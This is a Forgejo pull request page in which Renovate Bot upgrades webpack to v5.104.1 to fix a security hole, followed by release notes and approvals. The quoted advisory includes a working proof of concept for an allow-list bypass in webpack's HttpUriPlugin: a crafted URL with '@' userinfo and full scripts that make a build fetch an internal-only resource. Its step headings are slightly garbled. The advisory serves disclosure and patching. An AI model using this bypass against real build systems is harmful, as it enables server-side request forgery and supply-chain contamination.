`http://127.0.0.1:9000@&#8203;127.0.0.1:9100/secret.js` If the allow-list is `["http://127.0.0.1:9000"]`, then: - Raw string check: `crafted.startsWith("http://127.0.0.1:9000")` → **true** - URL parsing (WHAT `new URL()` will contact): `origin` → `http://127.0.0.1:9100` (host/port after `@`) As a result, webpack fetches `http://127.0.0.1:9100/secret.js` even though `allowedUris` only included `http://127.0.0.1:9000`. **Evidence from reproduction:** - Server logs showed the internal-only endpoint being fetched: - `[internal] 200 /secret.js served (...)` (observed multiple times) - Attacker-side build output showed: - the internal secret marker was present in the **bundle** - the internal secret marker was present in the **buildHttp cache** <img width="1651" height="381" alt="image-2" src="https://github.com/user-attachments/assets/8fd81b35-0d4f-424b-b60e-0a2582a8b492" /> ##### PoC This PoC is intentionally constrained to **127.0.0.1** (localhost-only “internal service”) to demonstrate SSRF behavior safely. ##### 1) Setup ```bash mkdir split-userinfo-poc && cd split-userinfo-poc npm init -y npm i -D webpack webpack-cli ``` ##### 2) Create server.js ```js #!/usr/bin/env node "use strict"; const http = require("http"); const ALLOWED_PORT = 9000; // allowlisted-looking host const INTERNAL_PORT = 9100; // actual target if bypass succeeds const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`; const internalPayload = `// internal-only\n` + `export const secret = ${JSON.stringify(secret)};\n` + `export default "ok";\n`; function listen(port, handler) { return new Promise(resolve => { const s = http.createServer(handler); s.listen(port, "127.0.0.1", () => resolve(s)); }); } (async () => { // "Allowed" host (should NOT be contacted if bypass works as intended) await listen(ALLOWED_PORT, (req, res) => { console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`); res.statusCode = 200; res.setHeader("Content-Type", "application/javascript; charset=utf-8"); res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`); }); // Internal-only service (SSRF-like target) await listen(INTERNAL_PORT, (req, res) => { if (req.url === "/secret.js") { console.log(`[internal] 200 /secret.js served (secret=${secret})`); res.statusCode = 200; res.setHeader("Content-Type", "application/javascript; charset=utf-8"); res.end(internalPayload); return; } console.log(`[internal] 404 ${req.method} ${req.url}`); res.statusCode = 404; res.end("not found"); }); console.log("\nServers up:"); console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`); console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`); })(); ``` ##### 2) Create server.js ```js #!/usr/bin/env node "use strict"; const path = require("path"); const os = require("os"); const fs = require("fs/promises"); const webpack = require("webpack"); function fmtBool(b) { return b ? "✅" : "❌"; } async function walk(dir) { const out = []; let items; try { items = await fs.readdir(dir, { withFileTypes: true }); } catch { return out; } for (const it of items) { const p = path.join(dir, it.name); if (it.isDirectory()) out.push(...await walk(p)); else if (it.isFile()) out.push(p); } return out; } async function fileContains(f, needle) { try { const buf = await fs.readFile(f); const s1 = buf.toString("utf8"); if (s1.includes(needle)) return true; const s2 = buf.toString("latin1"); return s2.includes(needle); } catch { return false; } } (async () => { const webpackVersion = require("webpack/package.json").version; const ALLOWED_PORT = 9000; const INTERNAL_PORT = 9100; // NOTE: allowlist is intentionally specified without a trailing slash // to demonstrate the risk of raw string prefix checks. const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`; // Crafted URL using userinfo so that: // - The string begins with allowedUri // - The actual authority (host:port) after '@&#8203;' is INTERNAL_PORT const crafted = `http://127.0.0.1:${ALLOWED_PORT}@&#8203;127.0.0.1:${INTERNAL_PORT}/secret.js`; const parsed = new URL(crafted); const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-")); const srcDir = path.join(tmp, "src"); const distDir = path.join(tmp, "dist"); const cacheDir = path.join(tmp, ".buildHttp-cache"); const lockfile = path.join(tmp, "webpack.lock"); const bundlePath = path.join(distDir, "bundle.js"); await fs.mkdir(srcDir, { recursive: true }); await fs.mkdir(distDir, { recursive: true }); await fs.writeFile( path.join(srcDir, "index.js"), `import { secret } from ${JSON.stringify(crafted)}; console.log("LEAKED_SECRET:", secret); export default secret; ` ); const config = { context: tmp, mode: "development", entry: "./src/index.js", output: { path: distDir, filename: "bundle.js" }, experiments: { buildHttp: { allowedUris: [allowedUri], cacheLocation: cacheDir, lockfileLocation: lockfile, upgrade: true } } }; console.log("\n[ENV]"); console.log(`- webpack version: ${webpackVersion}`); console.log(`- node version: ${process.version}`); console.log(`- allowedUris: ${JSON.stringify([allowedUri])}`); console.log("\n[CRAFTED URL]"); console.log(`- import specifier: ${crafted}`); console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`); console.log(`- WHAT URL() parses:`); console.log(` - username: ${JSON.stringify(parsed.username)} (userinfo)`); console.log(` - password: ${JSON.stringify(parsed.password)} (userinfo)`); console.log(` - hostname: ${parsed.hostname}`); console.log(` - port: ${parsed.port}`); console.log(` - origin: ${parsed.origin}`); console.log(` - NOTE: request goes to origin above (host/port after @&#8203;), not to "${allowedUri}"`); const compiler = webpack(config); compiler.run(async (err, stats) => { try { if (err) throw err; const info = stats.toJson({ all: false, errors: true, warnings: true }); if (stats.hasErrors()) { console.error("\n[WEBPACK ERRORS]"); console.error(info.errors); process.exitCode = 1; return; } const bundle = await fs.readFile(bundlePath, "utf8"); const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i); const foundSecret = m ? m[0] : null; console.log("\n[RESULT]"); console.log(`- temp dir: ${tmp}`); console.log(`- bundle: ${bundlePath}`); console.log(`- lockfile: ${lockfile}`); console.log(`- cacheDir: ${cacheDir}`); console.log("\n[SECURITY CHECK]"); console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`); if (foundSecret) { const lockHit = await fileContains(lockfile, foundSecret); const cacheFiles = await walk(cacheDir); let cacheHit = false; for (const f of cacheFiles) { if (await fileContains(f, foundSecret)) { cacheHit = true; break; } } console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`); console.log(`- cache contains secret: ${fmtBool(cacheHit)}`); } } catch (e) { console.error(e); process.exitCode = 1; } finally { compiler.close(() => {}); } }); })(); ``` ##### 4) Run Terminal A: ```bash node server.js ``` Terminal B: ```bash node attacker.js ``` ##### 5) Expected vs Actual Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed). Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache. ##### Impact Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs. Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination. #### Severity - CVSS Score: Unknown - Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N` #### References - [https://github.com/webpack/webpack/security/advisories/GHSA-8fgc-7cc6-rx7x](https://github.com/webpack/webpack/security/advisories/GHSA-8fgc-7cc6-rx7x) - [https://nvd.nist.gov/vuln/detail/CVE-2025-68458](https://nvd.nist.gov/vuln/detail/CVE-2025-68458) - [https://github.com/webpack/webpack](https://github.com/webpack/webpack) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-8fgc-7cc6-rx7x) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>webpack/webpack (webpack)</summary> ### [`v5.104.1`](https://github.com/webpack/webpack/blob/HEAD/CHANGELOG.md#51041) [Compare Source](https://github.com/webpack/webpack/compare/v5.104.0...v5.104.1) ##### Patch Changes - [`2efd21b`](https://github.com/webpack/webpack/commit/2efd21b): Reexports runtime calculation should not accessing **WEBPACK\_IMPORT\_KEY** decl with var. - [`c510070`](https://github.com/webpack/webpack/commit/c510070): Fixed a user information bypass vulnerability in the HttpUriPlugin plugin. ### [`v5.104.0`](https://github.com/webpack/webpack/blob/HEAD/CHANGELOG.md#51040) [Compare Source](https://github.com/webpack/webpack/compare/v5.103.0...v5.104.0) ##### Minor Changes - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Use method shorthand to render module content in `__webpack_modules__` object. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Enhance `import.meta.env` to support object access. - [`4baab4e`](https://github.com/webpack/webpack/commit/4baab4e): Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront. - [`04cd530`](https://github.com/webpack/webpack/commit/04cd530): Handle more at-rules for CSS modules. - [`cafae23`](https://github.com/webpack/webpack/commit/cafae23): Added options to control the renaming of at-rules and various identifiers in CSS modules. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Added `base64url`, `base62`, `base58`, `base52`, `base49`, `base36`, `base32` and `base25` digests. - [`5983843`](https://github.com/webpack/webpack/commit/5983843): Provide a stable runtime function variable `__webpack_global__`. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Improved `localIdentName` hashing for CSS. ##### Patch Changes - [`22c48fb`](https://github.com/webpack/webpack/commit/22c48fb): Added module existence check for informative error message in development mode. - [`50689e1`](https://github.com/webpack/webpack/commit/50689e1): Use the fully qualified class name (or export name) for `[fullhash]` placeholder in CSS modules. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Support universal lazy compilation. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Fixed module library export definitions when multiple runtimes. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Fixed CSS nesting and CSS custom properties parsing. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Don't write fragment from URL to filename and apply fragment to module URL. - [`aab1da9`](https://github.com/webpack/webpack/commit/aab1da9): Fixed bugs for `css/global` type. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Compatibility `import.meta.filename` and `import.meta.dirname` with `eval` devtools. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Handle nested `__webpack_require__`. - [`728ddb7`](https://github.com/webpack/webpack/commit/728ddb7): The speed of identifier parsing has been improved. - [`0f8b31b`](https://github.com/webpack/webpack/commit/0f8b31b): Improve types. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Don't corrupt `debugId` injection when `hidden-source-map` is used. - [`2179fdb`](https://github.com/webpack/webpack/commit/2179fdb): Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Serialize `HookWebpackError`. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Added ability to use built-in properties in dotenv and define plugin. - [`3c4319f`](https://github.com/webpack/webpack/commit/3c4319f): Optimizing the regular expression character class by specifying ranges for runtime code. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Reduce collision for local indent name in CSS. - [`d3dd841`](https://github.com/webpack/webpack/commit/d3dd841): Remove CSS link tags when CSS imports are removed. </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - Between 12:00 AM and 03:59 AM ( * 0-3 * * * ) (UTC). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Renovate Bot](https://github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41LjAiLCJ1cGRhdGVkSW5WZXIiOiI0My41LjAiLCJ0YXJnZXRCcmFuY2giOiJ2MTQuMC9mb3JnZWpvIiwibGFiZWxzIjpbImRlcGVuZGVuY3ktdXBncmFkZSIsInRlc3Qvbm90LW5lZWRlZCJdfQ==-->
Update dependency webpack to v5.104.1 [SECURITY]
Some checks failed
issue-labels / release-notes (pull_request_target) Has been skipped
Details
issue-labels / cascade (pull_request_target) Has been skipped
Details
requirements / merge-conditions (pull_request) Successful in 2s
Details
testing / frontend-checks (pull_request) Successful in 1m50s
Details
testing / backend-checks (pull_request) Successful in 6m40s
Details
testing / test-unit (pull_request) Successful in 8m27s
Details
testing / test-e2e (pull_request) Failing after 7m20s
Details
testing / test-remote-cacher (redis) (pull_request) Successful in 3m1s
Details
testing / test-remote-cacher (redict) (pull_request) Successful in 3m13s
Details
testing / test-remote-cacher (garnet) (pull_request) Successful in 3m16s
Details
testing / test-remote-cacher (valkey) (pull_request) Successful in 3m17s
Details
testing / test-mysql (pull_request) Successful in 31m1s
Details
testing / test-pgsql (pull_request) Successful in 42m25s
Details
testing / test-sqlite (pull_request) Successful in 26m45s
Details
testing / security-check (pull_request) Failing after 1m17s
Details
issue-labels / backporting (pull_request_target) Has been skipped
Details
milestone / set (pull_request_target) Successful in 14s
Details
196557c9eb
Gusted approved these changes 2026-02-21 16:15:16 +01:00
Gusted left a comment
Copy link

Experimental options, wasn't used and thus unaffected. But lets merge a security PR anyway.

Experimental options, wasn't used and thus unaffected. But lets merge a security PR anyway.
👍 1
Gusted scheduled this pull request to auto merge when all checks succeed 2026-02-21 16:15:58 +01:00
viceice approved these changes 2026-02-22 09:12:51 +01:00
viceice merged commit 6b6e9da3cd into v14.0/forgejo 2026-02-22 09:13:24 +01:00
viceice deleted branch renovate/v14.0/forgejo-npm-webpack-vulnerability 2026-02-22 09:13:25 +01:00
Sign in to join this conversation.
Reviewers
No reviewers
Gusted
viceice
Labels
Clear labels   
arch
riscv64

Archived

  
backport/v1.19
Scheduled for backport to Forgejo v1.19

Archived

  
backport/v1.20
Scheduled for backport to Forgejo v1.20

Archived

  
backport/v1.21/forgejo
Scheduled for backport to Forgejo v1.21

Archived

  
backport/v10.0/forgejo
Automated backport to v10.0

Archived

  
backport/v11.0/forgejo
Automated backport to v11.0

  
backport/v12.0/forgejo
Automated backport to v12.0

Archived

  
backport/v13.0/forgejo
Automated backport to v13.0

Archived

  
backport/v14.0/forgejo
Automated backport to v14.0

Archived

  
backport/v15.0/forgejo
Automated backport to v15.0

  
backport/v7.0/forgejo
Scheduled for backport to Forgejo v7.0

Archived

  
backport/v8.0/forgejo
Scheduled for backport to Forgejo v8.0

Archived

  
backport/v9.0/forgejo
Scheduled for backport to Forgejo v9.0

Archived

  
breaking
The release containing this change is not backward compatible

  
bug
Something is not working

Archived

  
bug
confirmed
 it can be reproduced

  
bug
duplicate
 bug has already been reported in the Forgejo tracker

  
bug
needs-more-info
 the information provided does not contain enough details

  
bug
new-report
 bug has just been reported and need triage (default label on issue creation)

  
bug
reported-upstream
 bug cannot be fixed within Forgejo easily, it has been reported upstream

  
code/actions
Forgejo Actions feature

  
code/api
API

  
code/auth
Forgejo Authentication

  
code/auth/faidp
Forgejo as Identity Provider (in OAuth/OIDC flow)

  
code/auth/farp
Forgejo as Relying Party / Client (in OAuth/OIDC flow)

  
code/email
Everything related to email in Forgejo

  
code/federation
Federation

  
code/git
Related to the Git backend in Forgejo

  
code/migrations
Migration between Git forges (i.e. for GitHub, GitLab, Gitea, Forgejo, etc.). NOT for database migrations.

  
code/packages
Forgejo package and container registry

  
code/wiki
  
database
MySQL
 https://www.mysql.com/

  
database
PostgreSQL
 https://www.postgresql.org/

  
database
SQLite
 https://sqlite.org/

  
dependency-upgrade
https://codeberg.org/forgejo/forgejo/issues/2779

  
dependency
Chi
 https://github.com/go-chi/chi/

Archived

  
dependency
Chroma
 https://github.com/alecthomas/chroma/

Archived

  
dependency
F3
 https://f3.forgefriends.org/

  
dependency
ForgeFed
 https://forgefed.org

  
dependency
garage
 https://git.deuxfleurs.fr/Deuxfleurs/garage

  
dependency
Gitea
 https://github.com/go-gitea/gitea

Archived

  
dependency
Golang
 https://go.dev/

  
Discussion

   
duplicate
This issue or pull request already exists

  
enhancement/feature
New feature

  
forgejo/accessibility
Accessibility (a11y)

  
forgejo/branding
Branding (logo, name, tagline etc.)

  
forgejo/ci
Forgejo Actions CI configuration

  
forgejo/commit-graph
The commit graph feature and page.

  
forgejo/documentation

   
forgejo/furnace cleanup
Keeping Forgejo in sync with its dependencies and contributing back to them

Archived

  
forgejo/i18n
t9n/translation, l10n/localization, and i18n/internationalization of Forgejo

  
forgejo/interop
Interoperability with other services: Webhooks, bridges, integrations

  
forgejo/moderation
Moderation

  
forgejo/privacy
Privacy first

  
forgejo/release
Release management

  
forgejo/scaling
Performance and scaling

  
forgejo/security
Security (please disclose responsibly)

  
forgejo/ui
User interface

  
Gain
High
 User research provides indicators that this would be good to have, interested contributors are encouraged to pick this.

  
Gain
Nice to have
 This is likely worth having, but the assumption is not backed by user research data (it might benefit a small amount of users only.) Unlikely to receive much attention, but feel free to pick.

  
Gain
Undefined
 Not enough information to assess the request's benefits. This issue may be closed if no gain is established: You can help by giving us more input.

  
Gain
Very High
 User research indicates that this is an important improvement for Forgejo users. Contributions very welcome!

  
good first issue
Optimal for first-timers! Make sure to look for further explanations and ask for help if needed. If you want, you can consider the person who added this label as a point of contact.

  
i18n/backport-stable
This PR needs to be backported to stable branch of Forgejo safely and manually, using a migration script.

  
impact
large
 Large impact: Potential data loss, many users affected, major degradation in UX.

  
impact
medium
 Medium impact: Several users affected, degradation in UX, workarounds might be available but inconvenient.

  
impact
small
 Small impact: No data loss, workarounds might be available, affects few users.

  
impact
unknown
 Report was not yet triaged to assess impact.

  
Incompatible license
This pull request contains changes that are not (yet) compatible with the current Forgejo license

  
issue
closed
 The issue was resolved in the repository of the dependency

  
issue
do-not-exist-yet
 An issue should be created in the respository of the dependency

  
issue
open
 An open issue exists in the upstream repository of the dependency

  
manual test
Pull requests that have been merged with a manual test

Archived

  
Manually tested during feature freeze
The manual test instructions were followed

  
OS
FreeBSD
 Specific to the FreeBSD Operating System

  
OS
Linux
 Specific to (GNU/)Linux Operating Systems

  
OS
macOS
 Specific to the MacOS Operating System

  
OS
Windows
 Specific to the Windows Operating System

  
problem
A user report about a problem. Needs to be triaged to find potential solutions.

  
QA

   
regression
found in the version of the milestone and not before

  
release blocker
Issues that must be fixed before the release can be published

  
Release Cycle
Feature Freeze
 Only bug fixes with automated tests (except for CSS/JavaScript)

  
release-blocker
v7.0
 Issues that must be fixed before Forgejo v7.0 can be released 17 April 2024

Archived

  
release-blocker
v7.0.1
 Issues that must be fixed before Forgejo v7.0.1 can be released

Archived

  
release-blocker
v7.0.2
 Issues that must be fixed before Forgejo v7.0.2 can be released

Archived

  
release-blocker
v7.0.3
 Issues that must be fixed before Forgejo v7.0.3 can be released

Archived

  
release-blocker
v7.0.4
 Issues that must be fixed before Forgejo v7.0.4 can be released

Archived

  
release-blocker
v8.0.0
 Issues that must be fixed before Forgejo v8.0.0 can be released

Archived

  
release-blocker/v9.0.0
Issues that must be fixed before Forgejo v9.0.0 can be released

Archived

  
run-all-playwright-tests
Add this label to a PR to run all playwright tests manually.

  
run-end-to-end-tests
Trigger additional tests on the PR when it is ready to be merged

  
stage
2-research
 Needs research to moe on.

  
stage
3-design
 Needs design to move on

  
stage
4-implementation
 This is actionable and waits for implementation

  
test
manual
 manual testing has been documented

  
test
needed
 test should be added

  
test
needs-help
 help needed to add a test

  
test
not-needed
 no additional test is needed

  
test
present
 test has been added

  
untested
Pull requests that have been merged with no test and submitted as is to the dependency where they belong

Archived

  
User research - time-tracker
Time tracking feature for issues and the JS stopwatch.

  
valuable code
This PR was closed because the implementation is incomplete

  
worth a release-note
Add this PR to the release notes

  
User research - Accessibility
Requires input about accessibility features, likely involves user testing.

  
User research - Blocked
Do not pick as-is! We are happy if you can help, but please coordinate with ongoing redesign in this area.

  
User research - Community
Community features, such as discovering other people's work or otherwise feeling welcome on a Forgejo instance.

  
User research - Config (instance)
Instance-wide configuration, authentication and other admin-only needs.

  
User research - Errors
How to deal with errors in the application and write helpful error messages.

  
User research - Filters
How filter and search is being worked with.

  
User research - Future backlog
The issue might be inspiring for future design work.

  
User research - Git workflow
AGit, fork-based and new Git workflow, PR creation etc

  
User research - Labels
Active research about Labels

  
User research - Moderation
Moderation Featuers for Admins are undergoing active User Research

  
User research - Needs input
Use this label to let the User Research team know their input is requested.

  
User research - Notifications/Dashboard
Research on how users should know what to do next.

  
User research - Rendering
Text rendering, markup languages etc

  
User research - Repo creation
Active research about the New Repo dialog.

  
User research - Repo units
The repo sections, disabling them and the "Add more" button.

  
User research - Security

   
User research - Settings (in-app)
How to structure in-app settings in the future?

No labels
arch
riscv64
backport/v1.19
backport/v1.20
backport/v1.21/forgejo
backport/v10.0/forgejo
backport/v11.0/forgejo
backport/v12.0/forgejo
backport/v13.0/forgejo
backport/v14.0/forgejo
backport/v15.0/forgejo
backport/v7.0/forgejo
backport/v8.0/forgejo
backport/v9.0/forgejo
breaking
bug
bug
confirmed
bug
duplicate
bug
needs-more-info
bug
new-report
bug
reported-upstream
code/actions
code/api
code/auth
code/auth/faidp
code/auth/farp
code/email
code/federation
code/git
code/migrations
code/packages
code/wiki
database
MySQL
database
PostgreSQL
database
SQLite
dependency-upgrade
dependency
Chi
dependency
Chroma
dependency
F3
dependency
ForgeFed
dependency
garage
dependency
Gitea
dependency
Golang
Discussion
duplicate
enhancement/feature
forgejo/accessibility
forgejo/branding
forgejo/ci
forgejo/commit-graph
forgejo/documentation
forgejo/furnace cleanup
forgejo/i18n
forgejo/interop
forgejo/moderation
forgejo/privacy
forgejo/release
forgejo/scaling
forgejo/security
forgejo/ui
Gain
High
Gain
Nice to have
Gain
Undefined
Gain
Very High
good first issue
i18n/backport-stable
impact
large
impact
medium
impact
small
impact
unknown
Incompatible license
issue
closed
issue
do-not-exist-yet
issue
open
manual test
Manually tested during feature freeze
OS
FreeBSD
OS
Linux
OS
macOS
OS
Windows
problem
QA
regression
release blocker
Release Cycle
Feature Freeze
release-blocker
v7.0
release-blocker
v7.0.1
release-blocker
v7.0.2
release-blocker
v7.0.3
release-blocker
v7.0.4
release-blocker
v8.0.0
release-blocker/v9.0.0
run-all-playwright-tests
run-end-to-end-tests
stage
2-research
stage
3-design
stage
4-implementation
test
manual
test
needed
test
needs-help
test
not-needed
test
present
untested
User research - time-tracker
valuable code
worth a release-note
User research - Accessibility
User research - Blocked
User research - Community
User research - Config (instance)
User research - Errors
User research - Filters
User research - Future backlog
User research - Git workflow
User research - Labels
User research - Moderation
User research - Needs input
User research - Notifications/Dashboard
User research - Rendering
User research - Repo creation
User research - Repo units
User research - Security
User research - Settings (in-app)
Milestone
Clear milestone
No items
No milestone
Forgejo v14.0.3
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
3 participants
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
forgejo/forgejo!11398
No description provided.